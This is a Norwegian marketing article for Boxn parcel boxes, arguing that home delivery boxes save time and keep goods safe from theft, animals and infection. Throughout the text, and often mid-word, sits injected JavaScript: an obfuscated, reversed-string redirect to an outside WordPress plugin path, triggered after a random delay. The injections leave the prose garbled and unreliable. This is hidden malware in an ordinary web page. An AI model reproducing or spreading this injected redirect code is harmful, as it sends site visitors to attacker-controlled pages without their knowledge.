Mer frihet og økt sikkerhet

Fjern tidsklemma og øke tryggheten

Mer frihet til å jobbe, trene, følge opp familien og til å slappe av. Kjenn på at roen senker seg, når du ikke behøver å bekymre deg for om varene du har bestilt, blir stjålet, utsatt for virus eller ikke levert.

Tid er penger og frihet

Ikke bruk masse tid på å vente hjemme på at et bud skal levere varene dine, det er din tid og den burde være mye mer verdifull enn tiden til et bud. Om det er matvarer, pakker, post eller toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andre ting, så er det uansett dine ting som du har betalt for, hvorfor skal budets kjøreruter diktere din tid?
Boxn gir deg tid og frihet tilbake. Med boxn rett utenfor døra kan du ta inn sendingene når det passer deg, gjerne med tøflene på! Du kan også betro den med å sørge for at feilkjøp går i retur innen angrefristen går ut. Netthtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andel på dine premisser!

Har tiden løpt fra selvbetjening?

Vi klager på stress og tidsklemma mens vi ønsker oss mer fritid og ikke minst mindre stress. I den moderne verden vi lever i, hvor netthtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andel øker for hver dag som går, er det fortsatt noe som skurrer. Går vi 200 år tilbake i tid, ble varer levert på døren i «Downtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}town Abbey». De ble tatt imot og kvittert for. Var ingen hjemme, fikk ikke budet levert eller betalt.

Her hjemme var det heller ikke uvanlig at den lokale kjøpmannen leverte fersk melk og toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andre matvarer på døra. Selv om samfunnet har blitt modernisert og på mange måter blitt digitalisert, må vi som forbrukere sitte parat i flere timer hjemme for å vente på å ta imot budet med matvarer eller toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andre pakker. I tillegg må vi betale ekstra om vi ønsker å få varene levert når det passer oss best. Samtidig må vi stadig oftere bite i det sure eplet og hente pakkene vi bestilte hjem, i en butikk med Post-i-butikk, fordi budet påstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tod at vi ikke var hjemme til avtalt tid.

Økt stress med venting og siden tid og frihet tapt. Som om ikke det i seg selv er ille nok, kan vi se langt etter å få tilbake de
pengene vi betalte ekstra for å få pakken levert hjem.

Les også: En god ide, men er den trygg?

Enkle, men usikre løsninger

Du kan nå i stadig større utstrekning avtale at budet setter igjen varene dine på trappen. Da kan du selvsagt risikere at varene dine blir stjålet, at matvarene dine blir spist av fugler eller toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andre dyr, eller at de går i stykker som følge av været.

Med virusfrykten som herjer, har netthtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andel av mat for hjemlevering nærmest eksplodert. Dog kan mat som settes igjen usikret utenfor døra være en potensiell smittefare.Heldigvis finnes det en løsning. En løsning som ikke bare gir deg tid og frihet tilbake, men som også gir deg økt trygghet. Løsningen kan i tillegg bidra til reduserte utslipp, økt trafikksikkerhet, mindre kø, friere konkurranse og økt lønnsomhet for alle.

Følg med videre, lik siden vår på Facebook og meld deg på vårt nyhetsbrev nederst på siden.

Relaterte artikler

Pakkeboks, Aktiv kjøl, klikk og hent, mat

Smart Supply og Boxn!

Boxn har i en lengre periode samarbeidet tett med Smart Supply om utrulling av pakkerterminaler i det norske markedet. Vi har gjennom dette samarbeidet fått

Helse vest IKT, Haukeland sykehus. IT utstyr, Pakkeboks, pakkebokser

Ny terminal ute hos Helse Vest!

Boxn og Helse Vest IKT har inngått en spennende pilot. Vi var i forrige uke i Bergen og leverte og monterte en MultiBoxn terminal. Denne

MultiBoxn med Aktiv kjøl

Endelig er MultiBoxn med aktiv kjøl på plass hos oss. Disse boksene har vi lenge ønsket å få produsert og levert da dette gir Boxn

nb_NONorwegian